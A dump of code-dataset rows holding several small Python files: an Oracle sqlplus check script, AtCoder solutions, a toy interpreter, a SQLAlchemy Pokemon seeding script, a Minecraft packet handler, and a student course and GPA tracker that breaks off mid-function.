blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
528fdb89634d853ef8ee5161ca4b647ab15dc579 | cd941f5f6e9dcf33ead0581b9c3c2fc62ff532ec | /check_database/check_database.py | 8850f14600fd367f4c1d190e588d29faf44c8c7c | [] | no_license | uzixxx/pythoncode | a7cea32ef6e8c73232295affd4bbdfdebcac0644 | 36a171ba5ef3ee9f9a9303b466cb12082ae71e23 | refs/heads/master | 2023-03-25T08:18:55.434727 | 2020-12-22T13:04:53 | 2020-12-22T13:04:53 | 320,172,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 765 | py | import subprocess
# Oracle client installation root; sqlplus is resolved beneath it.
oracle_home = 'D:/app/Administrator/product/11.2.0/dbhome_1'
# NOTE(review): placeholder credentials hard-coded in source — move to a
# config file or environment variables before real use.
user_name = 'xxxx'
user_passwd = 'xxxx'
user_tns = '127.0.0.1:1521/orcl'  # host:port/service connect string
user_sqlplus = oracle_home + '/bin' + '/' + 'sqlplus'
# OS-authenticated sysdba login vs. username/password@tns login commands.
default_shell = user_sqlplus + ' / as sysdba'
user_shell = user_sqlplus + ' ' + user_name + '/' + user_passwd + '@' + user_tns
def check_database(shell_input):
    """Spawn the given shell command (expected to be a sqlplus invocation)
    and feed it the ``check_database.sql`` script on stdin.

    Prints '1' on a clean run and '2' plus the exception text on failure.

    Returns:
        True when the child process was spawned and driven to completion,
        False when any exception was raised along the way.
    """
    try:
        proc = subprocess.Popen(shell_input, stdin=subprocess.PIPE, shell=True)
        # Ask the spawned client to execute the health-check script.
        proc.stdin.write(b'@check_database.sql')
        proc.communicate()
        print('1')
        return True
    except Exception as exc:
        print('2')
        print(str(exc))
        return False
# Script entry: probe the database as sysdba and report the outcome.
if check_database(default_shell):
    print("succeed")
else:
    print("error")
| [
"595865975@qq.com"
] | 595865975@qq.com |
98b24527a49dde6f431800e65ba9394fb4c3a89e | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /atcoder/abc288_e.py | 70c4f614907f574c7e19042d8ed2d2ab4cc3fcdb | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # https://atcoder.jp/contests/abc288/tasks/abc288_d
# from numba import njit
# from functools import lru_cache
import sys
# Fast buffered stdin reader (deliberately shadows the builtin `input`).
input = sys.stdin.buffer.readline
INF = 1001001001001001  # sentinel "unreachable" cost
N, M = map(int, input().split())
A = list(map(int, (input().split())))  # base price of each item
# C[k]: extra cost values; cost table below takes running minima over them.
# NOTE(review): exact semantics of C depend on the problem statement — verify.
C = list(map(int, (input().split())))
X = list(map(int, (input().split())))  # 1-based indices of items that MUST be bought
# dp[i][j]: minimum total cost after deciding items 0..i-1 with j of them bought.
dp = [[INF]*(N+1) for _ in range(N+1)]
dp[0][0] = 0
# for i in range(N+1):
#     dp[i][0] = 0
# cost[i][j]: cheapest applicable surcharge when item i is bought while j of
# the earlier items were also bought — running minimum of C[i-j..i].
cost = [[0]*N for _ in range(N)]
for i in range(N):
    for j in range(i+1):
        if j==0:
            cost[i][j] = C[i]
        else:
            cost[i][j] = min(cost[i][j-1], C[i-j])
# for i in range(N):
#     print(cost[i])
idx = 0  # pointer into X: next mandatory item to account for
for i in range(N):
    for j in range(i+1):
        # Transition 1: buy item i (base price + best surcharge).
        dp[i+1][j+1] = min(dp[i+1][j+1], dp[i][j] + A[i] + cost[i][j])
        # Skipping is forbidden for mandatory items.
        if idx<M and i==X[idx]-1: continue
        # Transition 2: skip item i.
        dp[i+1][j] = min(dp[i+1][j], dp[i][j])
    if idx<M and i==X[idx]-1:
        idx += 1
# for i in range(N+1):
#     print(dp[i])
# At least the M mandatory items must have been bought.
ans = INF
for j in range(M, N+1):
    ans = min(ans, dp[N][j])
# for i in range(M):
#     ans += A[X[i]-1]
print(ans)
# WA
# import sys
# input = sys.stdin.buffer.readline
# # def input(): return sys.stdin.readline().rstrip()
# # sys.setrecursionlimit(10 ** 7)
# import copy
# N, M = map(int, input().split())
# A = list(map(int, (input().split())))
# C = list(map(int, (input().split())))
# X = list(map(int, (input().split())))
# ans = 0
# for i in range(M):
# ans += A[X[i]-1]
# pre = [[]]
# idx = 0
# for i in range(N):
# jj = 0
# if i==X[idx]-1:
# v = C[X[idx]-1]
# u = X[idx] - 1
# for j in range(idx):
# if C[X[idx]-1-j]<v:
# v = C[X[idx]-1-j]
# u = X[idx] - 1
# for j in range(len(pre[u])):
# # print(u, j, pre[u])
# if j<jj:
# if C[u-j-1]: break
# v = C[u-j-1]
# else:
# if v<pre[u][j]+C[u-j-1]: break
# v = pre[u][j]+C[u-j-1]
# jj = max(jj, j+1)
# ans += v
# print(ans, idx, v, u)
# idx += 1
# pre.append(copy.copy(pre[-1]))
# pre[-1].append(A[i] + C[i])
# pre[-1].sort()
# # print(pre)
# print(ans)
| [
"hironobukawaguchi3@gmail.com"
] | hironobukawaguchi3@gmail.com |
2ee2dcf3dcd8da231a4ddae3d99e7792e2185f23 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/3o.py | 6d08125d0b91f6c1763e4b9719945ab4e63276fb | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 485 | py | import sys
def printFunction(lineRemaining):
    # Python 2 code.  `lineRemaining` is a list of whitespace-split tokens.
    # Prints the tokens between a leading and trailing standalone '"' token,
    # re-joined with single spaces; an empty quoted payload prints a blank line.
    # NOTE(review): tokens that are not delimited by standalone '"' tokens are
    # silently ignored — confirm that is the intended behavior.
    if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
        if len(lineRemaining) > 2:
            # data to print
            lineRemaining = lineRemaining[1:-1]
            print ' '.join(lineRemaining)
        else:
            print
def main(fileName):
    # Python 2 code.  Interpret each line of the given file: lines whose first
    # token is the opcode '3O' are passed to printFunction; any other opcode
    # prints 'ERROR' and aborts processing.
    with open(fileName) as f:
        for line in f:
            data = line.split()
            if data[0] == '3O':
                printFunction(data[1:])
            else:
                print 'ERROR'
                return

if __name__ == '__main__':
    # The input program file is the first command-line argument.
    main(sys.argv[1])
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
c82e9d1d48077221ebd7c1d33228d3e2e26cffdb | fbfd051d3448d350efb94ea5571d5b1a3989ead6 | /hackathon/exoticPet/app/db/dbscript.py | cfc14cc52b2c2111b78b2b272b0c3d350ac86727 | [] | no_license | cliffmin/rapid_prototyping | 08cb64e8d9ac90a748aa6f082cb2f38fdad0677d | bd0485745cff352b73ad0b74d8c4bc8cd89ff038 | refs/heads/master | 2016-08-05T06:41:03.823213 | 2014-03-08T23:40:31 | 2014-03-08T23:40:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | import datetime
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from table_def import Pokemon
engine = create_engine('sqlite:///pokemon.db', echo=True)
# create a Session
Session = sessionmaker(bind=engine)
session = Session()
# Create an artist
pikachu = Pokemon("Pikachu", "male", "electric", "9")
charmander = Pokemon("Charmander", "male", "fire", "17")
chancey = Pokemon("Chancey", "female", "egg", "18")
steelix = Pokemon("Steelix", "male", "metal", "20")
squirtle = Pokemon("Squirtle", "female", "water", "10")
bulbasaur = Pokemon("Bulbasaur", "male", "grass", "20")
butterfree = Pokemon("Butterfree", "female", "insect", "30")
jigglypuff = Pokemon("jigglypuff", "female", "moon", "25")
oddish = Pokemon("Oddish", "male", "grass", "40")
dewgong = Pokemon("Dewgong", "female", "moon", "17")
# add more albums
# Add the record to the session object
session.add(pikachu)
session.add(charmander)
session.add(steelix)
session.add(chancey)
session.add(squirtle)
session.add(bulbasaur)
session.add(butterfree)
session.add(jigglypuff)
session.add(dewgong)
# commit the record the database
session.commit()
| [
"cliffmin@gmail.com"
] | cliffmin@gmail.com |
90b417bedd17743c79571e8607da6f6a022d1f12 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03024/s808391195.py | bd7e39cfcdbb36cf608ec3f0dbb696430bf5c305 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | s = list(input())
counter = 0
k = len(s)
for i in range(k):
if s[i] == "o":
counter += 1
if counter+(15-k) >= 8:
print("YES")
else:
print("NO") | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
3b4c743f75615f62c7429fe6b6ce779f1b9f4d18 | 627e78797b40c2140fdb62020bef37c9640d51d1 | /packets/PluginMessage.py | 84ecd77294375a049435f51d2c6b9f49e4a89674 | [] | no_license | magnusjjj/tuxcraft | fefcca0f81541c5976c05324a4dc3dad7dd7c494 | 3586b366b16f3795d9ba238dfbb6de38efcdb6bc | refs/heads/master | 2020-05-26T01:55:43.364377 | 2012-09-27T08:56:30 | 2012-09-27T08:56:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 329 | py | # -*- coding: utf-8 -*-
import time
import struct
import tuxcraft_tools
def command(thread):
print 'Pluginmessage'
channel = tuxcraft_tools.minecraft_read_string(thread.channel) # Message string
length = tuxcraft_tools.minecraft_read_short(thread.channel) # Message string
data = thread.channel.recv(length) # Message string
| [
"tuxie@tuxie-mint.(none)"
] | tuxie@tuxie-mint.(none) |
94bca947c8473901ff7ae6d069379f1cceededab | 51d8a1ce1cadde093a9e1a1810f75714068de941 | /alphatracker.py | 1fab71cceb3c062d5848556f70e9703285d627ad | [] | no_license | Acescout92/IT106-AlphaTracker | 3ec58bec8cae8d2a2b8adda26537edf468add9dd | caea082f859efe8c97fb8417d851b786b38bc00e | refs/heads/master | 2020-03-23T06:08:51.849145 | 2018-07-16T20:34:03 | 2018-07-16T20:34:03 | 141,191,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,655 | py | #-------------------------------------------------------------------------------
# Alpha Tracker
# Student Names:Bryce H and Ashok S.
# Assignment: project_2.py
# Submission Date: 5/6/2018
# Python Version: 3.6
#-------------------------------------------------------------------------------
# Honor Code Statement: I received no assistance on this assignment that
# violates the ethical guidelines as set forth by the
# instructor and the class syllabus.
#-------------------------------------------------------------------------------
# References: stackoverflow for os.path.isfile method syntax and usage.
#-------------------------------------------------------------------------------
# Note: (a note to the grader as to any problems or uncompleted aspects of
# of the assignment)
#-------------------------------------------------------------------------------
# Pseudocode:
# Starts here
#Please refer to report.docx; pseudo code was too long for this area.
#-------------------------------------------------------------------------------
# Source Code: Your main module should be written here
#-------------------------------------------------------------------------------
import json
import os
from random import randint
import time
def start_here():
    """Application entry point.

    If both course data files already exist, load the stored user profile
    and prompt for login: success drops into the main menu, failure exits.
    Otherwise run first-time setup (register a user, persist the profile to
    userfile.json, build the course files) and loop back to the login path.
    """
    while True:
        if os.path.isfile('current_courses.json') and os.path.isfile('full_courses.json'):
            user = retrieve_user()
            if check_login(user):
                main_menu(user)
            else:
                print("Failed to log in. Exiting Program.")
                exit()
        # First time run initialization
        else:
            user = create_login()
            # path = 'C:\\Users\\bryce\\documents\\IT106'  # Hardcoded placeholder. Must change to dump files to .py files directory.
            # path += "\\userfile.json"
            with open('userfile.json', 'w') as user_file:
                json.dump(user, user_file)
            first_run(user)
            continue
def main_menu(user):  # WORK TO BE CONTINUED FROM HERE
    """Display the top-level menu loop and dispatch to each feature.

    Args:
        user: dict mapping username -> [username, password, g_number, gpa].

    The GPA shown in the banner is computed once on entry, so edits made in
    submenus are not reflected until the program restarts — TODO confirm
    whether that is intended.
    """
    gpa = gpa_calculator()
    clear_screen()
    while True:
        # The profile dict holds a single entry; this loop prints its banner.
        for val in user.values():
            print("\nWelcome "+str(val[0])+", G-Number: " + str(val[2])+" GPA: "+str(gpa)+ "!")
        try:
            main = int(input("Please select from the following:\n1.Class Schedule\n2.Edit Class Schedule\n3.GPA Simulator\n4.Grad Date Simulator\n5.Exit\n"))
            if main == 1:
                print_schedule()
            elif main == 2:
                edit_schedule()
            elif main == 3:
                gpa_menu(gpa)
            elif main == 4:
                grad_simulator(user)
            elif main == 5:
                exit()
            else:
                print("Invalid selection. Please try again\n")
                continue
        # Non-numeric menu input raises ValueError from int().
        except ValueError:
            print("Invalid selection. Please try again")
            continue
def create_login():
    """Interactively register a new user.

    Prompts for a username and password, generates a random 8-digit
    G-Number, and returns a dict keyed by username whose value is
    [username, password, g_number, 0.0].

    NOTE(review): the password is stored in plain text and the username is
    not validated here despite the prompt's implied rules — confirm intent.
    """
    user = {}
    username = input("We see that you are a new user! Please create a username!\n")
    password = input("Please input your password \n")
    clear_screen()
    print("Username accepted. Now generating g-number:\n")
    g_num = randint(00000000,99999999)
    print("Your new G-Number is: G", g_num)
    user[username] = [username, password, g_num, 0.0]
    return user  # Return type: dictionary
def first_run(user):
    """First-time setup: build and persist the two course data files.

    Collects every class required for the major into full_courses.json,
    then builds the current semester schedule into current_courses.json.
    The `user` argument is accepted but not used here.
    """
    print("Hello, and welcome to My Tracker v.01 alpha")
    print("Thank you. Beginning initial set up. Please be patient")
    full_list = collect_courses()  # full_list contains the entirety of the classes for the major
    with open('full_courses.json', 'w') as full_courses_file:
        json.dump(full_list, full_courses_file)
    print("Thank you. Now, we will build your current class load.")
    with open('current_courses.json', 'w') as current_classes:
        # Using the full list, create the current class schedule.
        json.dump(current_load(full_list), current_classes)
def collect_courses():
    """Interactively collect every class required for the major.

    Returns:
        dict mapping upper-cased course code -> [credit_hours, grade, status]
        where status is one of A/D/W/C (as typed by the user).

    NOTE(review): the status is stored exactly as typed (possibly lower
    case) while other code compares against 'C' — confirm callers uppercase
    it or that users are trusted to.
    """
    clear_screen()
    full_courses = {}
    input("First, We need to build a list of every class required for your major, and their respective credit values.")
    while True:
        clear_screen()
        print(full_courses)
        class_code = input("Please input course code. i.e: IT106\n If you are finished, press q to quit\n")
        if class_code == 'q':
            break
        elif class_code.upper() in full_courses.keys():
            print("You have already input this class. Please try again")
            continue
        class_code = class_code.upper()
        try:
            credit_hours = int(input("input the credit value for course: "+class_code+"\n"))
            grade = input("If you have already finished " + class_code+", please give your final letter grade. Otherwise type 0\n")
            status = input("Please give the status of this class: A-Actively Taking D-Dropped W-Withdrawn C-Completed\n")
            if status.upper() == 'A' or status.upper() == 'D' or status.upper() == 'W' or status.upper() == 'C': # changed this, OR can't be used after a single == like it was before
                full_courses[class_code] = [credit_hours, grade, status]
            else:
                input("Invalid selection")
                continue
        # Non-numeric credit values raise ValueError from int().
        except ValueError:
            input("Invalid entry. ")
            continue
    return full_courses
def current_load(full_list):
    """Interactively build the current semester schedule.

    Args:
        full_list: dict of all major courses (from collect_courses); only
            codes present there may be scheduled.

    Returns:
        dict mapping course code -> [day_list, start_time, end_time, grade].

    NOTE(review): the duplicate-class branch below `continue`s without
    re-prompting for a new code, which re-enters the loop with the same
    value — looks like an infinite loop; confirm and fix upstream.
    """
    days_list = ['mon', 'tues', 'wed', 'thurs', 'fri','sat','sun']
    valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F",'0']
    clear_screen()
    current_schedule = {}
    print("Here are all of the classes you have input thus far: ", full_list.keys())
    input("Now, we will begin to build you current course schedule. Press any key to continue")
    class_code = input("Input class code, or type 'q' to quit: ")
    while class_code!= 'q':
        print(current_schedule)
        try:
            if class_code == 'q':
                break
            elif class_code.upper() not in full_list.keys():
                print("This class does not exist in your full list. Please try again:")
                class_code = input("Input class code, or type 'q' to quit: ")
                continue
            elif class_code.upper() in current_schedule:
                print("You have already entered the information for this class. Please try again ")
                continue
            else:
                class_code = class_code.upper()
                day = input("What days does "+class_code+" take place on? Separate by comma and use format:\nmon\ntues\nwed\nthurs\nfri\nsat\nsun ").split(',')
                # This only warns about bad day tokens; it does not re-prompt.
                for val in day:
                    if val not in days_list:
                        print("Invalid option")
                        continue
                start_time = int(input("Using format 2400, what time does "+class_code+" begin?\n"))
                end_time = int(input("Using format 2400, what time does "+class_code+" end?\n"))
                grade = input("What letter grade do you currently have? If no grade, input 0 ")
                if grade not in valid_grades:
                    print("Invalid input")
                    continue
                current_schedule[class_code] = [day, start_time, end_time, grade]
                class_code = input("Input class code, or type 'q' to quit: ")
        # Non-numeric times raise ValueError from int().
        except ValueError:
            input("Invalid input. Press any key to continue ")
            continue
    return current_schedule
def retrieve_user():
    """Load and return the stored user profile dict from userfile.json.

    Retries until the file can be opened.  When the file is missing, a
    warning is printed and the interactive registration flow is run before
    trying again.  NOTE(review): the dict returned by create_login() is
    discarded here — behavior preserved from the original.
    """
    while True:
        try:
            with open('userfile.json', 'r') as profile_file:
                return json.load(profile_file)
        except IOError:
            print("User File not found!")
            create_login()
            continue
def check_login(user):
    """Prompt for credentials and verify them against the stored profile.

    Args:
        user: dict mapping username -> [username, password, g_number, gpa].

    Returns:
        True when the typed password matches the stored one; False when the
        user gives up (answers 'n' to the retry prompt).

    NOTE(review): passwords are compared in plain text here — confirm the
    stored value is not meant to be hashed.
    """
    clear_screen()
    while True:
        check_username = input("Please input your username\n")
        if check_username in user.keys():
            check_password = input("Please input your password\n")
            if check_password == user[check_username][1]:
                return True
            else:
                error = input("Password mismatch. Try again? type n to quit, or any key to continue \n")
                if error != 'n':
                    continue
                else:
                    return False
        else:
            error = input("No username match! type n to quit or any key to continue \n")
            if error != 'n':
                continue
            else:
                return False
def print_schedule():
    """Print the stored weekly schedule, ordered Sunday through Saturday.

    Reads current_courses.json (course -> [days, start, end, grade]) and
    prints one line per (day, course) pairing.  Always returns 0.
    """
    clear_screen()
    print("====Current Schedule====")
    with open('current_courses.json', 'r') as current_file:
        schedule = json.load(current_file)
    week = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']
    for weekday in week:
        for course, details in schedule.items():
            if weekday not in details[0]:
                continue
            time_slot = str(details[1]) + '-' + str(details[2])
            print(weekday, course, time_slot + " Presumed Grade: " + details[3])
    return 0
def grad_simulator(user):
    """Report progress toward graduation and offer the semester simulator.

    Reads full_courses.json, totals the required credits, and counts the
    courses/credits already completed (status 'C'), then loops on a small
    menu until the user quits.  The `user` argument is accepted but unused.
    Always returns 0.
    """
    while True:
        total_credits = 0
        c_classes = 0
        completed_credits = []
        with open('full_courses.json', 'r') as full_courses:
            schedule = json.load(full_courses)
        for val in schedule.values():
            total_credits+=val[0]
            if val[2] == 'C':
                c_classes+=1
                completed_credits.append(val[0])
        print("Your major requires a total of: "+str(total_credits)+" credits to graduate. You have completed: " +str(c_classes)+" classes, or "+ str(sum(completed_credits)) + " credits")
        try:
            menu = int(input("\n1.Simulate by Semester\n2.Quit\n"))
            while menu != 2:
                if menu == 1:
                    sem_sim(total_credits,c_classes,completed_credits)
                menu = int(input("\n1.Simulate by Semester\n2.Quit\n"))
            break
        # Non-numeric menu input raises ValueError from int().
        except ValueError:
            input("Incorrect input. Press any key to try again")
            continue
    return 0
def sem_sim(total_credits, c_classes, completed_credits):  # REQUIRES MORE WORK
    """Project remaining credits after a user-described year of semesters.

    Args:
        total_credits: total credits required by the major.
        c_classes: number of completed classes (currently unused here).
        completed_credits: list of credit values already earned.

    Prompts for the number of semesters and the credits planned in each,
    then prints the projected credits remaining and a rough class count
    (assuming 3 credits per class).  Always returns 0.
    """
    clear_screen()
    while True:
        clear_screen()
        by_semester = []
        credits_remaining = total_credits - sum(completed_credits)
        print("Let's start by getting some information about your semester load. ")
        print("In a year, a student may take 4 semesters: Spring, Summer, Fall, Winter. ")
        try:
            semesters_count = int(input("How many semesters will you be taking this year? "))
            for val in range(semesters_count):
                credits = int(input("How many credits are you taking in semester: " +str(val+1)+"?"))
                by_semester.append(credits)
            print("Ok! Here's what your projected credit spread looks like for the year: \n", by_semester)
            projected_credit_impact = credits_remaining - sum(by_semester)
            # Rough conversion: assumes every remaining class is worth 3 credits.
            classes_left = projected_credit_impact / 3
            print("If you follow your current plan, you will have: "+str(projected_credit_impact)+" credits remaining, which roughly translates to "+str(round(classes_left,2))+" classes remaining ")
            input("Press any key to continue")
            break
        # Non-numeric counts raise ValueError from int().
        except ValueError:
            input("Invalid input. Press any key to continue")
            continue
    return 0
def gpa_calculator():
    """Compute the cumulative GPA from 'full_courses.json'.

    Each entry in the file maps a course code to [credits, letter_grade,
    status]; only completed courses (status 'C') with a recognized letter
    grade contribute.

    Fixes two defects in the original version: a completed course with an
    unrecognized grade (e.g. '0') no longer shifts the credit/grade zip
    pairing out of alignment, and an empty transcript returns 0.0 instead
    of raising ZeroDivisionError.

    Returns:
        GPA rounded to two decimal places (0.0 when no completed, graded
        courses exist).
    """
    grade_converter = {"A": 4.00, "A-": 3.67, "B+": 3.33, "B": 3.00,
                       "B-": 2.67, "C+": 2.33, "C": 2.00, "C-": 1.67,
                       "D": 1.00, "F": 0.0}
    with open('full_courses.json', 'r') as fp:
        full_courses = json.load(fp)
    quality_points = 0.0
    credit_total = 0
    for credits, grade, course_status in full_courses.values():
        # Only completed courses with a real letter grade count toward GPA.
        if course_status == 'C' and grade in grade_converter:
            credit_total += credits
            quality_points += credits * grade_converter[grade]
    gpa = round(quality_points / credit_total, 2) if credit_total else 0.0
    print("GPA CALCULATED AS: "+str(gpa))
    return gpa
def gpa_menu(gpa):
    """Simulate end-of-semester and cumulative GPA from predicted grades.

    Args:
        gpa: the current cumulative GPA (used to weight the cumulative
            projection).

    Loops on a two-option menu; option 1 asks for a predicted letter grade
    for each class in current_courses.json and prints both the projected
    semester GPA and the resulting cumulative GPA.  Always returns 0.

    NOTE(review): int(input(...)) here is not wrapped in try/except, so
    non-numeric menu input raises ValueError — confirm whether the caller
    is expected to handle that.
    """
    clear_screen()
    valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F",]
    print("===GPA Simulator===")
    while True:
        menu = int(input("Please select from the following options:\n1.Simulate Semester GPA & Cumulative GPA\n2.Exit and Return to Main Menu"))
        if menu == 1:
            grade_array = []
            with open('current_courses.json', 'r') as fp:
                current_courses = json.load(fp)
            with open('full_courses.json', 'r') as full_file:
                full_courses = json.load(full_file)
            full_credits = [y[0] for x,y in full_courses.items() if y[2]=='C']  # Holds the total credit values of all completed classes
            predicted_credits = [y[0] for x,y in full_courses.items() if x in current_courses.keys()]  # Holds the credit values of the predicted classes from the current_courses list
            print("These are you current classes:\n")
            for val, val2 in current_courses.items():
                print(val)
            for val in current_courses.keys():
                grade = input("Input predicted letter grade for class: "+str(val)+" ")
                # An invalid grade aborts the whole prompting loop, leaving
                # grade_array shorter than predicted_credits (zip truncates).
                if grade not in valid_grades:
                    print("Invalid input")
                    break
                else:
                    credit_value = grade_conversion(grade)
                    grade_array.append(credit_value)
            total = [val2*val3 for val2,val3 in zip(predicted_credits, grade_array)]  # Takes the credits and grade values for the predicted classes and multiplies them together. Creates an array of true GPA-affective values
            sem_gpa = round(sum(total)/sum(predicted_credits),2)  # Builds predicted GPA
            predicted_gpa_val = sum(predicted_credits)*sem_gpa  # Multiplies total predictive credits with the predicted semester GPA
            current_gpa_val = sum(full_credits)*gpa  # Multiplies total earned credits with current GPA
            cum_gpa = round((current_gpa_val + predicted_gpa_val)/(sum(full_credits)+sum(predicted_credits)),2)  # Weighted average of earned and predicted quality points
            print("Predicted GPA for the end of the semester is: " + str(sem_gpa)+". Your cumulative GPA would be: "+str(cum_gpa))
        elif menu == 2:
            print("exiting...")
            break
    return 0
def grade_conversion(grade):
    """Convert a letter grade to its 4.0-scale grade-point value.

    Args:
        grade: letter grade string such as "A", "B+", "C-".

    Returns:
        The corresponding grade-point float, or None when the grade is not
        a recognized letter grade.  (The previous implementation spun in an
        infinite loop for unrecognized grades; no caller could observe a
        return value in that case, so returning None is backward-compatible.)
    """
    grade_converter = {"A": 4.00, "A-": 3.67, "B+": 3.33, "B": 3.00,
                       "B-": 2.67, "C+": 2.33, "C": 2.00, "C-": 1.67,
                       "D": 1.00, "F": 0.0}
    # Direct dictionary lookup replaces the old linear scan inside a busy loop.
    return grade_converter.get(grade)
def edit_schedule():
    """Course-editing menu: edit, close out, add, or remove current classes.

    Loads both JSON files up front, then loops on a five-option menu:
      1. edit details of a scheduled class (delegates to
         edit_current_schedule)
      2. close out the semester: record final grades into full_courses.json
         and truncate current_courses.json
      3. add a class from the full list to the current schedule
      4. delete a class from the current schedule
      5. exit

    Always returns 0.

    NOTE(review): option 3 checks `class_code` against full_courses without
    upper-casing but stores it upper-cased, and the day-validation loop
    only warns (setting days to "0") without re-prompting — confirm
    intended behavior before relying on these paths.
    """
    days_list = ['mon', 'tues', 'wed','thurs', 'fri', 'sat', 'sun']
    valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F","0"]
    clear_screen()
    with open('full_courses.json', 'r') as f_file:
        full_courses = json.load(f_file)
    with open('current_courses.json', 'r') as s_file:
        current_courses = json.load(s_file)
    while True:
        try:
            print("====Course Editing Menu====")
            menu = int(input("1.Edit Class Schedule\n2.Close out current_classes\n3.Add Class to current schedule\n4.Remove courses\n5.Exit"))
            if menu == 1:
                edit_current_schedule(current_courses, full_courses)
            elif menu ==2:
                choice = input("Are you sure you want to close out your schedule? This will wipe out your current_courses file (Y/N) ")
                if choice.upper() == "Y":
                    # Record a final grade and mark each class completed.
                    for val,val2 in current_courses.items():
                        grade = input("Enter final letter grade for class: "+val)
                        full_courses[val][1] = grade
                        full_courses[val][2] = "C"
                    with open('full_courses.json', 'w') as fp:
                        json.dump(full_courses, fp)
                    # Opening for write and closing immediately truncates the file.
                    fp = open('current_courses.json', 'w')
                    fp.close()
                    print("Current_courses file wiped")
                    continue
                elif choice.upper() == 'N':
                    continue
            elif menu == 3:
                class_code = input("Input class code, i.e IT106 ")
                if class_code not in full_courses.keys():
                    print("Class does not exist ")
                    continue
                else:
                    days = input("Using format mon, tues, wed, thurs, fri, sat, sun, input class days. Separate by comma").split(',')
                    for val in days:
                        if val not in days_list:
                            clear_screen()
                            print("WARNING: Invalid option")
                            days = "0"
                            continue
                    start_time = int(input("Using format 2400, input start time: "))
                    end_time = int(input("Using format 2400, input end time: "))
                    grade = input("Input letter grade for this class. If no grade, input 0: ")
                    if grade not in valid_grades:
                        grade = "0"
                        print("Invalid option")
                        continue
                    else:
                        current_courses[class_code.upper()] = [days,start_time,end_time,grade.upper()]
                        with open('current_courses.json', 'w') as fp:
                            json.dump(current_courses, fp)
                        continue
            elif menu == 4:
                print("Here are the courses of your semester: ")
                for val in current_courses:
                    print(val)
                course_code = input("Which class do you want to delete? ")
                if course_code not in current_courses.keys():
                    print("Invalid Entry")
                    continue
                else:
                    choice = input("Are you sure you want to delete: " +course_code+"?(Y/N) ")
                    if choice.upper() == "Y":
                        del current_courses[course_code]
                        with open('current_courses.json', 'w')as fp:
                            json.dump(current_courses, fp)
                        continue
                    else:
                        continue
            elif menu == 5:
                break
        # Non-numeric menu or time input raises ValueError from int().
        except ValueError:
            print("Invalid input, try again")
            continue
    return 0
def edit_current_schedule(current_courses, full_courses):
    """Edit days, times, or grade for one class in the current schedule.

    Args:
        current_courses: dict of course -> [days, start, end, grade];
            mutated in place.
        full_courses: dict of course -> [credits, grade, status]; the grade
            field is kept in sync when option 3 is used.

    Loops until the user picks option 4 (Save and Quit), at which point
    both dicts are written back to their JSON files.  Always returns 0.

    NOTE(review): a class code that is not in the dicts raises KeyError
    here (only ValueError is caught) — confirm whether validation belongs
    in this function.
    """
    days_list = ['mon', 'tues', 'wed','thurs', 'fri', 'sat', 'sun']
    valid_grades= ["A", "A-","B+","B","B-","C+","C","C-","D","F"]
    clear_screen()
    while True:
        try:
            print("Here are your current classes")
            for val in current_courses:
                print(val)
            choice = int(input("Please select which one you'd like to edit:\n1.Days\n2.Time\n3.Grade\n4.Save and Quit "))
            if choice !=4:
                class_code = input("Which class? ")
                if choice == 1:
                    days = input("Please input days using style: mon,tues,wed,thurs,fri,sat,sun. Separate by comma ").split(',')
                    # Any invalid token reverts to the previously stored days.
                    for val in days:
                        if val not in days_list:
                            print("Invalid option")
                            days = current_courses[class_code][0]
                            current_courses[class_code][0] = days
                        else:
                            current_courses[class_code][0] = days
                elif choice == 2:
                    start_time = int(input("Using format 2400, input start time: "))
                    end_time = int(input("Using format 2400, input end time: "))
                    current_courses[class_code][1] = start_time
